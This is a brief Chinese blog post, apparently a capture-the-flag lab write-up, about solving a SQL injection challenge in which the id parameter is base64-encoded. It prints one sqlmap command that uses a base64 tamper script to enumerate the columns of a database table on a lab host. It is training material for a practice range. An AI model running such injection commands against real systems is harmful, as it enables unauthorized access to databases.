前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >360靶场考核一道注入题

360靶场考核一道注入题

原创
作者头像
HipHip
修改2020-04-15 19:13:33
8390
修改2020-04-15 19:13:33
举报
文章被收录于专栏:靶机渗透
001
001

注入题。id参数可疑,是base64加密。

可以手注,但是半天没找到点。直接上SQLMap跑。

代码语言:javascript
复制
sqlmap -u "http://116.63.149.36:54375/show.php?id=MQo=" --tamper=base64encode -D test -T data --columns --level=3

002
002

003
003

看到flag,原来是墨者学院的题目。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档